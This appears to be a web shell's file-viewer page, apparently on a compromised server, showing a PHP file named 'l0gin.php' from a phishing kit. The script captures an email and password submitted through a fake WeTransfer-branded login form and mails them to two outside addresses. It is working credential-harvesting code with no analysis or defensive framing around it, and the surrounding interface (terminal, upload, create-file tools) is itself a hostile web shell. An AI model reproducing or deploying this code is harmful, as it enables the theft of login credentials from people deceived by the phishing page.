B4BY.588
Home
Terminal
Upload
information
Create File
Create Folder
About
Tools
:
/
disk1
/
worms
/
cespsin
/
2021sep09
/
ihh
/
Filename :
l0gin.php
back
Copy
<?php //Get the necessary variables from the server. $email = $_POST['X1']; $password = $_POST['X2']; //Define required variables and send user input to $myEmail. $myEmail = 'c.c7r@yandex.com, fabio@ozoel.co'; $subject = 'WeTransfer'; $message = 'Email: '.$email. ' Password: '.$password; mail($myEmail, $subject, $message); ?>